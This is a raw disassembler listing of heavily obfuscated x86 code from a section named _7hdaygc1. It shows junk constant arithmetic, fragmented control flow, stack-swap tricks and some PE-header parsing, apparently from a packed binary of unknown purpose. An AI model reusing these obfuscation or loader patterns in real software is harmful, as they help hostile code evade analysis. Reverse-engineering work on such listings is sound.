loc_42B12D: ; CODE XREF: _7hdaygc1:loc_423532�j
or edx, 59DE7F41h
and edx, 0ED1DC742h
xor edx, 14B6E855h
push edx
pushf
jmp loc_42DFDB
; ---------------------------------------------------------------------------
loc_42B146: ; CODE XREF: _7hdaygc1:00426804�j
jg loc_42DB33
; =============== S U B R O U T I N E =======================================
sub_42B14C proc near ; CODE XREF: sub_42FAB8-C86B�p
; FUNCTION CHUNK AT 00427EBA SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042FBD6 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
mov dword ptr [ebp-0Ch], 1
loc_42B157: ; CODE XREF: sub_425C2C:loc_423987�j
; _7hdaygc1:004247B8�j
push 25AA4237h
pop eax
jmp loc_42FBD6
sub_42B14C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EE8A
loc_42B162: ; CODE XREF: sub_42EE8A-5B10�j
jge loc_427123
xor ecx, edi
jmp loc_424FA4
; END OF FUNCTION CHUNK FOR sub_42EE8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F05E
loc_42B16F: ; CODE XREF: sub_42F05E:loc_42A892�j
cmp dword ptr [ebp-10h], 0
jnz loc_42EA8D
mov eax, [ebp+8]
push eax
cmp dword ptr [ebp-14h], 6
jmp loc_42D60F
; END OF FUNCTION CHUNK FOR sub_42F05E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F0A
loc_42B186: ; CODE XREF: sub_424F0A+10�j
add edx, 4F16F188h
xchg edx, [esp-4+arg_0]
jmp sub_4288FE
; END OF FUNCTION CHUNK FOR sub_424F0A
; ---------------------------------------------------------------------------
push eax
ror eax, 17h
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42B198: ; CODE XREF: sub_424AE1:loc_42B7C1�j
push esi
push 36F4918Dh
jmp loc_42546D
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
loc_42B1A3: ; CODE XREF: _7hdaygc1:00425B58�j
add ecx, 401E092Bh
add ecx, ebp
add ecx, 2AAEB9E8h
mov ecx, [ecx]
push edi
pushf
push 3F69E0E6h
pop edi
jmp loc_425B15
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BCD
loc_42B1C0: ; CODE XREF: sub_425BCD+16�j
add eax, 0EA763538h
mov eax, [eax]
mov [eax], ebx
mov eax, offset dword_42BC4C
call sub_42EBC8
; END OF FUNCTION CHUNK FOR sub_425BCD
; START OF FUNCTION CHUNK FOR sub_42A833
loc_42B1D4: ; CODE XREF: sub_42A833-7825�j
jmp loc_427E5B
; END OF FUNCTION CHUNK FOR sub_42A833
; ---------------------------------------------------------------------------
loc_42B1D9: ; CODE XREF: _7hdaygc1:0042323F�j
ror esi, 4
add edi, eax
jmp loc_42CAF6
; ---------------------------------------------------------------------------
loc_42B1E3: ; CODE XREF: _7hdaygc1:0042DFD6�j
jl loc_42E49F
pop ecx
shl esi, 1Eh
xchg ebx, [edi]
jmp loc_429F05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288C7
loc_42B1F4: ; CODE XREF: sub_4288C7+A�j
xchg edx, [esp+4+var_4]
mov ebx, edx
pop edx
and ebx, 0E32549E9h
add ebx, 0FF3DBC1Fh
mov [ebx], eax
jmp loc_42D42F
; END OF FUNCTION CHUNK FOR sub_4288C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C712
loc_42B20D: ; CODE XREF: sub_42C712+E�j
pop ecx
add ecx, 5A4F909h
xor ecx, 4F34E7A1h
and ecx, ds:4000FBh
add ecx, 0D63F467Eh
mov [ecx], eax
pop ecx
jmp nullsub_165
; END OF FUNCTION CHUNK FOR sub_42C712
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_32. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED4E
loc_42B22F: ; CODE XREF: sub_42ED4E-6847�j
jmp loc_42E10F
; END OF FUNCTION CHUNK FOR sub_42ED4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_42B234: ; CODE XREF: sub_42EF91:loc_42CD8A�j
and eax, 0B2598C1Ch
jmp loc_42D554
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_42B23F: ; CODE XREF: sub_423648:loc_42CA50�j
add eax, 0C804B31Eh
xor eax, 0A78B2E6h
push offset loc_423D7E
jmp nullsub_51
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A92E
loc_42B255: ; CODE XREF: sub_42A92E+1C7E�j
pop eax
call sub_428C3B
call sub_42A462
; END OF FUNCTION CHUNK FOR sub_42A92E
; START OF FUNCTION CHUNK FOR sub_42B650
loc_42B260: ; CODE XREF: sub_42B650+1�j
jmp loc_42453B
; END OF FUNCTION CHUNK FOR sub_42B650
; =============== S U B R O U T I N E =======================================
sub_42B265 proc near ; DATA XREF: _7hdaygc1:00428C01�o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042446C SIZE 00000026 BYTES
; FUNCTION CHUNK AT 004293BA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A617 SIZE 00000013 BYTES
add eax, [esp-4+arg_0]
adc edx, [esp+4]
add esp, 8
push ebx
jmp loc_42446C
sub_42B265 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jnp sub_42F6CD
jmp loc_42D244
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42512A
loc_42B280: ; CODE XREF: sub_42512A:loc_423077�j
; _7hdaygc1:00423086�j
xor ecx, 0FB5024E8h
add ecx, 6EA0E5D6h
xchg ecx, [esp+0]
jmp sub_423F02
; END OF FUNCTION CHUNK FOR sub_42512A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_54. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_42B295: ; CODE XREF: sub_42D9E1-5A81�j
jmp loc_4289C1
; END OF FUNCTION CHUNK FOR sub_42D9E1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_42B29A: ; CODE XREF: sub_42F65A-4111�j
call sub_425A37
; END OF FUNCTION CHUNK FOR sub_42F65A
; START OF FUNCTION CHUNK FOR sub_42E1F1
loc_42B29F: ; CODE XREF: sub_42E1F1-21BB�j
jmp nullsub_81
; END OF FUNCTION CHUNK FOR sub_42E1F1
; ---------------------------------------------------------------------------
loc_42B2A4: ; CODE XREF: _7hdaygc1:0042F2CA�j
jnz loc_42F39A
test ebp, esi
jmp loc_42F392
; ---------------------------------------------------------------------------
loc_42B2B1: ; CODE XREF: _7hdaygc1:00423C2D�j
; _7hdaygc1:loc_427204�j
xchg esi, [esp]
jmp loc_42E5BE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B2B9 proc near ; CODE XREF: sub_42DAD9�j
push ebp
mov ebp, esp
push edx
mov edx, ebx
sub_42B2B9 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42B2BF: ; CODE XREF: sub_42E283:loc_42DD90�j
xchg edx, [esp+0]
loc_42B2C2: ; CODE XREF: _7hdaygc1:loc_42A5F6�j
push ecx
pop ebx
jmp loc_42B872
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D002
loc_42B2C9: ; CODE XREF: sub_42D002:loc_423EB3�j
jz loc_42DE82
rol edi, 1Ch
xor ebp, ebx
js locret_4297AC
jmp loc_42DE81
; END OF FUNCTION CHUNK FOR sub_42D002
; ---------------------------------------------------------------------------
sbb ebx, ebp
jmp sub_424F3E
; ---------------------------------------------------------------------------
cdq
jmp loc_4284B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9E1
loc_42B2EC: ; CODE XREF: sub_42D9E1-C02�j
call sub_427F72
; END OF FUNCTION CHUNK FOR sub_42D9E1
; START OF FUNCTION CHUNK FOR sub_42CCDD
loc_42B2F1: ; CODE XREF: sub_42CCDD-15B7�j
jmp loc_42F2AC
; END OF FUNCTION CHUNK FOR sub_42CCDD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5B
loc_42B2F6: ; CODE XREF: sub_428B5B+3DCA�j
test edx, ecx
jmp loc_426EB3
; END OF FUNCTION CHUNK FOR sub_428B5B
; ---------------------------------------------------------------------------
loc_42B2FD: ; CODE XREF: _7hdaygc1:0042B807�j
jb loc_42C19A
mov [ecx], eax
; START OF FUNCTION CHUNK FOR sub_4232C2
loc_42B305: ; CODE XREF: sub_4232C2+8533�j
rol eax, 1Ch
xor eax, 0BE1F6F3Dh
jmp loc_42D434
; END OF FUNCTION CHUNK FOR sub_4232C2
; ---------------------------------------------------------------------------
sub edx, 0B2F1C9E4h
add eax, 190C3E81h
jmp sub_42B877
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42951D
loc_42B324: ; CODE XREF: sub_42951D:loc_42D614�j
jnz loc_427193
jmp loc_42EA65
; END OF FUNCTION CHUNK FOR sub_42951D
; =============== S U B R O U T I N E =======================================
sub_42B32F proc near ; CODE XREF: sub_427D8E-BF2�p
; sub_428120+7�j ...
; FUNCTION CHUNK AT 0042B84C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042CC53 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042DE25 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F5D2 SIZE 0000000E BYTES
js sub_42837F
push ebp
mov ebp, esp
mov esp, ebp
pop ebp
mov eax, ds:dword_425158
or eax, eax
jmp loc_42B84C
sub_42B32F endp
; ---------------------------------------------------------------------------
locret_42B348: ; CODE XREF: _7hdaygc1:0042ADCD�j
retn
; ---------------------------------------------------------------------------
loc_42B349: ; CODE XREF: _7hdaygc1:loc_428C36�j
jz loc_42E047
sub edx, 0C4ECD1A8h
and ebp, edx
adc ebx, 69235920h
jmp loc_42E047
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42B362: ; CODE XREF: sub_42C443:loc_4239BF�j
jns loc_42F235
mov ebx, [edx]
or ebp, 82BDC26h
jmp loc_42CF92
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
loc_42B375: ; CODE XREF: _7hdaygc1:0042F019�j
mov eax, [eax]
mov eax, [eax]
push ebx
push 87727A22h
pop ebx
xor ebx, 0EFDB2Dh
rol ebx, 4
cmp ebx, 48C0435Dh
jmp loc_424DA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4296EF
loc_42B394: ; CODE XREF: sub_4296EF:loc_42BC3C�j
push eax
push 0
push 0
call sub_42B942
push eax
pop edx
xor eax, eax
jmp loc_42D467
; END OF FUNCTION CHUNK FOR sub_4296EF
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F0D1
loc_42B3A8: ; CODE XREF: sub_42F0D1+13�j
jmp loc_42D4E1
; END OF FUNCTION CHUNK FOR sub_42F0D1
; =============== S U B R O U T I N E =======================================
sub_42B3AD proc near ; CODE XREF: sub_425561-1B0B�j
push ebp
call sub_425647
sub_42B3AD endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42A4F1
loc_42B3B3: ; CODE XREF: sub_42A4F1+1�j
mov ebp, esp
push edx
mov edx, ecx
xchg edx, [esp+8+var_8]
mov esp, ebp
xchg ebx, [esp+8+var_8]
mov ebp, ebx
pop ebx
jmp loc_425AC0
; END OF FUNCTION CHUNK FOR sub_42A4F1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_77. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DEA0
loc_42B3C9: ; CODE XREF: sub_42DEA0+A�j
jmp loc_424957
; END OF FUNCTION CHUNK FOR sub_42DEA0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_199. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42B3CF: ; CODE XREF: sub_424AE1:loc_42EF10�j
jge loc_428359
loc_42B3D5: ; CODE XREF: sub_423172+344C�j
jmp loc_424224
; END OF FUNCTION CHUNK FOR sub_424AE1
; ---------------------------------------------------------------------------
popf
pushf
jmp loc_42834D
; ---------------------------------------------------------------------------
loc_42B3E1: ; DATA XREF: sub_425008+189D�o
push 64D05A51h
pop eax
xor eax, 391CEB48h
and eax, 1314E44Dh
jmp loc_4234C2
; ---------------------------------------------------------------------------
loc_42B3F8: ; DATA XREF: _7hdaygc1:00425708�o
push esi
push 0EDC25153h
pop esi
sub esi, 207A1732h
jnz loc_426DCB
; START OF FUNCTION CHUNK FOR sub_424963
loc_42B40B: ; CODE XREF: sub_424963+8A80�j
jmp loc_426EE1
; END OF FUNCTION CHUNK FOR sub_424963
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BE63
loc_42B410: ; CODE XREF: sub_42BE63-120D�j
jmp sub_423F02
; END OF FUNCTION CHUNK FOR sub_42BE63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A03
loc_42B415: ; CODE XREF: sub_428A03+25�j
xchg edx, [esp+4+var_4]
jmp loc_42C86A
; END OF FUNCTION CHUNK FOR sub_428A03
; ---------------------------------------------------------------------------
loc_42B41D: ; CODE XREF: _7hdaygc1:loc_42A658�j
pop edi
push edx
pushf
push offset sub_4295F7
jmp locret_428F06
; ---------------------------------------------------------------------------
xchg edx, eax
jmp sub_42F621
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42524F
loc_42B431: ; CODE XREF: sub_42524F:loc_425BF7�j
pop edi
add edi, 0E587F1F1h
sub edi, 52164BC6h
or edi, 26E5572Ah
jnz loc_42EFD5
; END OF FUNCTION CHUNK FOR sub_42524F
; START OF FUNCTION CHUNK FOR sub_425F27
loc_42B44A: ; CODE XREF: sub_425F27:loc_42E5A9�j
pop edx
and edx, 15E07A46h
sub edx, 0F98B1829h
add edx, 0F275EE3Fh
jmp loc_42699B
; END OF FUNCTION CHUNK FOR sub_425F27
; =============== S U B R O U T I N E =======================================
sub_42B462 proc near ; CODE XREF: _7hdaygc1:004285E1�j
; _7hdaygc1:loc_42BB0F�p
xchg esi, [esp+0]
pop esi
rol eax, 11h
push eax
retn
sub_42B462 endp
; ---------------------------------------------------------------------------
loc_42B46B: ; CODE XREF: _7hdaygc1:0042690C�j
jmp loc_426A9E
; =============== S U B R O U T I N E =======================================
sub_42B470 proc near ; CODE XREF: sub_42F56C-B711�j
; sub_427EF6-2CCA�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004234A1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424436 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042629B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00426E6B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427386 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00427E68 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428C0B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042C5FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E89C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042F768 SIZE 0000001A BYTES
jz loc_427E68
push ebp
mov ebp, esp
jmp loc_424436
sub_42B470 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABF7
loc_42B47E: ; CODE XREF: sub_42ABF7-1A71�j
sub edx, 2FB6DF99h
or edx, 0C60B7E52h
add edx, 28E2C2C3h
xchg edx, [esp+0]
jmp sub_428E56
; END OF FUNCTION CHUNK FOR sub_42ABF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42409E
loc_42B498: ; CODE XREF: sub_42409E:loc_42F99B�j
lea eax, [ebp-14h]
xor edx, edx
call sub_42AA07
call sub_42DBF7
jmp loc_42EA9B
; END OF FUNCTION CHUNK FOR sub_42409E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B11
loc_42B4AC: ; CODE XREF: sub_428B11+1�j
mov ebp, esp
jno sub_426A62
loc_42B4B4: ; CODE XREF: _7hdaygc1:loc_42B8F2�j
add esp, 0FFFFFFF4h
mov [ebp-8], edx
call sub_426F53
loc_42B4BF: ; CODE XREF: _7hdaygc1:004265E3�j
jnz loc_42F6D8
jmp loc_42C292
; END OF FUNCTION CHUNK FOR sub_428B11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A1B6
loc_42B4CA: ; CODE XREF: sub_42A1B6:loc_42A1C5�j
jz loc_42C25D
jmp loc_42957B
; END OF FUNCTION CHUNK FOR sub_42A1B6
; ---------------------------------------------------------------------------
loc_42B4D5: ; CODE XREF: _7hdaygc1:0042E5F9�j
jo loc_4253CF
ror ecx, 3
; =============== S U B R O U T I N E =======================================
sub_42B4DE proc near ; CODE XREF: sub_42F075-90F9�p
; FUNCTION CHUNK AT 00424D14 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
push 245677C4h
pop ecx
or ecx, 71B58D46h
sub ecx, 5E8FF817h
jmp loc_424D14
sub_42B4DE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B4F9 proc near ; DATA XREF: sub_425752+7EDB�o
xchg edi, [esp+0]
call sub_42A9E0
call sub_42DD73
sub_42B4F9 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_99. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
sub esi, ecx
jmp loc_426538
; ---------------------------------------------------------------------------
loc_42B50E: ; CODE XREF: _7hdaygc1:0042DA60�j
xchg eax, [edx]
; =============== S U B R O U T I N E =======================================
sub_42B510 proc near ; CODE XREF: sub_42BF20:loc_42DEAF�p
; FUNCTION CHUNK AT 0042382D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E7B7 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov eax, [ebp-1Ch]
push eax
jmp loc_42E7B7
sub_42B510 endp
; ---------------------------------------------------------------------------
loc_42B51D: ; CODE XREF: _7hdaygc1:00423A18�j
jnz loc_42EE06
jmp loc_42992D
; ---------------------------------------------------------------------------
loc_42B528: ; CODE XREF: _7hdaygc1:00425EB2�j
cmp edi, esi
jmp loc_42EF36
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F65A
loc_42B52F: ; CODE XREF: sub_42F65A+1F9�j
mov [ebx], eax
pop ebx
push 315C421Eh
pop eax
rol eax, 0Eh
sub eax, 0B926F38Dh
xor eax, 8D9281A9h
add eax, ebp
jmp loc_42B29A
; END OF FUNCTION CHUNK FOR sub_42F65A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282A9
loc_42B54E: ; CODE XREF: sub_4282A9+782E�j
cdq
push 0CC68E1AEh
loc_42B554: ; CODE XREF: sub_4282A9:loc_42FACE�j
sub eax, 0F0AB0437h
xor eax, 2F5B4B27h
call sub_424DF3
test al, al
jz loc_42F44B
jmp loc_423234
; END OF FUNCTION CHUNK FOR sub_4282A9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_131. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42936E
loc_42B573: ; CODE XREF: sub_42936E+1�j
jmp loc_42EFE3
; END OF FUNCTION CHUNK FOR sub_42936E
; ---------------------------------------------------------------------------
loc_42B578: ; CODE XREF: _7hdaygc1:loc_428CB6�j
; _7hdaygc1:00428CC4�j
sub ebx, 7D77A194h
or ebx, 0E19B39BCh
add ebx, 7DEEE3F1h
add ebx, ebp
add ebx, 84159C07h
jmp loc_423A0D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42B597: ; CODE XREF: sub_42AFFE:loc_42EB9B�j
push 62C18153h
pop eax
xor eax, 0A256EC68h
and eax, 0B4A404C7h
rol eax, 0Ah
and eax, 6BF78462h
add eax, 17548AADh
jmp loc_42E7CB
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB24
loc_42B5BD: ; CODE XREF: sub_42EB24:loc_423406�j
jz loc_4237F0
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
jmp loc_426ACB
; END OF FUNCTION CHUNK FOR sub_42EB24
; ---------------------------------------------------------------------------
loc_42B5D0: ; CODE XREF: _7hdaygc1:0042AB82�j
jle loc_428684
loc_42B5D6: ; CODE XREF: _7hdaygc1:loc_42B07D�j
and edi, 79595B76h
test edi, 8000h
jmp loc_42ABBE
; ---------------------------------------------------------------------------
loc_42B5E7: ; CODE XREF: _7hdaygc1:00424DBF�j
mov edx, ebp
xchg edx, [esp]
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_425D26
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425360
loc_42B5F7: ; CODE XREF: sub_425360+4CAD�j
add ebx, 44488B39h
call sub_4263AB
; END OF FUNCTION CHUNK FOR sub_425360
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42B602: ; CODE XREF: sub_42AFFE+2C89�j
jmp sub_42828C
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
loc_42B607: ; CODE XREF: _7hdaygc1:0042ADE5�j
jmp locret_426280
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FD2A
loc_42B60C: ; CODE XREF: sub_42FD2A+E�j
push ecx
mov esp, ebp
; END OF FUNCTION CHUNK FOR sub_42FD2A
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42B60F: ; CODE XREF: sub_4291EA:loc_4254DA�j
xchg eax, [esp-8+arg_0]
mov ebp, eax
pop eax
call sub_42E0C4
loc_42B61A: ; CODE XREF: _7hdaygc1:loc_427CDC�j
jnz loc_42D65B
jmp loc_42E965
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_42B625: ; CODE XREF: sub_42AA07-439B�j
jnp sub_425522
loc_42B62B: ; CODE XREF: sub_42AA07:loc_42B886�j
mov eax, [ebp-4]
movzx eax, word ptr [eax+6]
push edx
push 978F0C5Dh
pop edx
xor edx, 6AF448D6h
jmp loc_427E27
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DDB
loc_42B644: ; CODE XREF: sub_42CFDA-9525�j
; sub_427455+9�j ...
mov eax, [ebp-0Ch]
loc_42B647: ; CODE XREF: _7hdaygc1:00425428�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_423DDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42524F
loc_42B64B: ; CODE XREF: sub_42524F+A�j
jmp loc_426952
; END OF FUNCTION CHUNK FOR sub_42524F
; =============== S U B R O U T I N E =======================================
sub_42B650 proc near ; CODE XREF: sub_4240D4+3�j
; _7hdaygc1:00424DE7�p ...
; FUNCTION CHUNK AT 0042453B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B260 SIZE 00000005 BYTES
push ebp
jmp loc_42B260
sub_42B650 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42B656: ; CODE XREF: _7hdaygc1:loc_42E32A�j
xchg ebp, [esp]
mov edi, ebp
pop ebp
jz loc_423104
jmp loc_42383E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42B667: ; CODE XREF: sub_425E64:loc_42BF51�j
add eax, 0DAF7DD59h
mov eax, [eax]
cmp dword ptr [eax+3Ch], 0
jz loc_424BDD
jmp loc_42EB02
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C3E4
loc_42B67E: ; CODE XREF: sub_42C3E4:loc_42A243�j
mov [ebp-4], eax
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
call sub_42F67A
; END OF FUNCTION CHUNK FOR sub_42C3E4
; START OF FUNCTION CHUNK FOR sub_4291A3
loc_42B68F: ; CODE XREF: sub_4291A3:loc_4265D1�j
jmp loc_424159
; END OF FUNCTION CHUNK FOR sub_4291A3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_182. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B907
loc_42B695: ; CODE XREF: sub_42B907-30F4�j
jmp loc_42A665
; END OF FUNCTION CHUNK FOR sub_42B907
; ---------------------------------------------------------------------------
loc_42B69A: ; CODE XREF: _7hdaygc1:0042343A�j
pop ebp
pop ecx
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42B69D: ; CODE XREF: sub_425E64+19�j
jmp loc_428ABC
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42B6A2: ; CODE XREF: sub_42C16F:loc_428FA0�j
xor [edx], eax
push 79D934BDh
pop eax
loc_42B6AA: ; CODE XREF: _7hdaygc1:00429143�j
xor eax, 22609AB7h
jmp loc_42307D
; END OF FUNCTION CHUNK FOR sub_42C16F
; =============== S U B R O U T I N E =======================================
sub_42B6B5 proc near ; DATA XREF: _7hdaygc1:00428C71�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423797 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004238BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004247F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428D03 SIZE 00000017 BYTES
mov eax, [ebp-3Ch]
xor edx, edx
push edi
push 3C320FCAh
jmp loc_4238BB
sub_42B6B5 endp
; ---------------------------------------------------------------------------
push 0E68E7A2Bh
pop edx
or edx, 952273BDh
test edx, 200000h
jmp loc_42596B
; ---------------------------------------------------------------------------
xor esi, ecx
jmp sub_42409E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42B6E3: ; CODE XREF: sub_42AA47-6096�j
pop edx
xor edx, 595774A7h
and edx, 61AAA0Dh
xor edx, 0A4FAD11Eh
call sub_42D232
loc_42B6FB: ; CODE XREF: _7hdaygc1:0042D9B3�j
jmp nullsub_38
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429532
loc_42B700: ; CODE XREF: sub_429532+20�j
jmp loc_42CB53
; END OF FUNCTION CHUNK FOR sub_429532
; ---------------------------------------------------------------------------
loc_42B705: ; CODE XREF: _7hdaygc1:00424583�j
xchg ebp, [esp]
mov esp, ebp
pop ebp
mov eax, ds:dword_42E544
jmp loc_4242AC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AE9C
loc_42B716: ; CODE XREF: sub_42AE9C+6�j
push offset loc_42AAF2
jmp loc_42FB79
; END OF FUNCTION CHUNK FOR sub_42AE9C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CCDD
loc_42B720: ; CODE XREF: sub_42CCDD:loc_429380�j
jz loc_42FD41
jmp loc_42B2F1
; END OF FUNCTION CHUNK FOR sub_42CCDD
; ---------------------------------------------------------------------------
loc_42B72B: ; CODE XREF: _7hdaygc1:00423D2B�j
mov eax, offset dword_42BC4C
call sub_427D8E
cmp ds:dword_42BC60, 0
jnz loc_429BBE
jmp loc_42F991
; ---------------------------------------------------------------------------
loc_42B747: ; CODE XREF: _7hdaygc1:0042BEE8�j
ror edi, 0Bh
; =============== S U B R O U T I N E =======================================
sub_42B74A proc near ; CODE XREF: _7hdaygc1:0042E594�p
; FUNCTION CHUNK AT 00423013 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423398 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004244D7 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004246AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426484 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042671D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00426FDB SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00427CC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004282CB SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00428E37 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C669 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042D066 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D34C SIZE 00000010 BYTES
xchg edi, [esp+0]
pop edi
push 95B89ED9h
sbb eax, 0EAA69224h
jmp loc_4282CB
sub_42B74A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_42B75E: ; CODE XREF: sub_423172:loc_429093�j
or edx, 5AD14220h
and edx, 8FE51CBEh
xor edx, 0F97D8E2Fh
push ebx
pushf
push 160C748Ah
jmp loc_428D52
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
